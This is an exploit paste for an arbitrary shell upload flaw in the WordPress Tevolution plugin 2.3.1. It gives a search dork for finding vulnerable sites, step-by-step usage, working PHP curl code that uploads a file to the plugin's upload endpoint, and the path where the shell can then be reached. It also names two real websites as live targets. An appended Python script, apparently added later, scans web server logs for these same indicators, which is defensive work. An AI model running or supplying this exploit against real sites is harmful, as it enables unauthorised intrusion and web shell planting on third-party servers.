- ######################
- # Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
- # Exploit Author : xBADGIRL21
- # Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
- # Vendor Homepage : https://templatic.com/
- # version : 2.3.1
- # Tested on: [ BackBox ]
- # skype:xbadgirl21
- # Date: 15/08/2016
- # video Proof : https://youtu.be/eVjW6rnaoSY
- ######################
- # [+] DESCRIPTION :
- ######################
- # [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
- # [+] Some of the features it enables include custom post types, monetization options, custom fields...
- # [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
- # [+] The vulnerability allows remote attackers to upload arbitrary files within the WordPress upload directory.
- ######################
- # [+] USAGE :
- ######################
- # 1.- Download or Copy the Exploit C0des
- # 2.- Use Dork and Choose One Of the Website
- # 3.- Edit The Script
- # 4.- Upload Your File : shell.php.jpg or shell.php.txt
- ######################
- # [+] Exploit:
- ######################
- <?php
- $uploadfile="roy.php.txt";
- $ch = curl_init("
- http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
- ");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- ######################
- # [+] Dev!l Path :
- ######################
- #
- http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/roy.php.txt
- ######################
- # [+] Live Demo :
- ######################
- # http://guiagronicaragua.com
- # http://eventsinsuriname.com
- ######################
- # Discovered by : xBADGIRL21 - Unkn0wN
- # Greetz : All Mauritanien Hackers - NoWhere
- #######################
- ### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
- # so I Just Write the Exploit C0des ...........
- #######################
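
Added example, not part of the original paste: a detection pass over web server access logs for the two indicators the advisory gives, a POST to the plugin's single-upload.php endpoint and a request for a double-extension file under the Directory theme's images/tmp/ folder. The combined log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicators taken from the advisory: the upload endpoint and the drop directory.
UPLOAD_ENDPOINT = ("/wp-content/plugins/Tevolution/tmplconnector/monetize/"
                   "templatic-custom_fields/single-upload.php")
DROP_DIR = "/wp-content/themes/Directory/images/tmp/"
# Script extension followed by a second one, e.g. roy.php.txt or shell.php.jpg.
DOUBLE_EXT = re.compile(r"\.(php\d?|phtml|phar)\.[a-z0-9]{1,5}$", re.I)
# Assumption: Apache/nginx "combined" access log format.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Aug/2016:10:01:02 +0000] "POST /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [15/Aug/2016:10:01:05 +0000] "GET /wp-content/themes/Directory/images/tmp/roy.php.txt HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [15/Aug/2016:10:02:00 +0000] "GET /blog/wp-content/themes/Directory/images/tmp/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Aug/2016:10:03:00 +0000] "GET /wp-content/themes/Directory/images/tmp/shell%2Ephp.jpg HTTP/1.1" 404 162 "-" "-"',
]

def scan(lines):
    """Return (rule, client_ip, decoded_path) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string, then decode %xx so encoded dots cannot hide an extension.
        path = unquote(m["path"].split("?", 1)[0])
        # endswith / "in" are used because WordPress may live under a sub-path.
        if m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            findings.append(("upload-endpoint-post", m["ip"], path))
        elif DROP_DIR in path and DOUBLE_EXT.search(path):
            # 200 means the file exists on disk; anything else is a probe.
            rule = "dropped-file-served" if m["status"] == "200" else "dropped-file-probe"
            findings.append((rule, m["ip"], path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A `dropped-file-served` hit means a double-extension file is present in the tmp directory and should be followed up on disk.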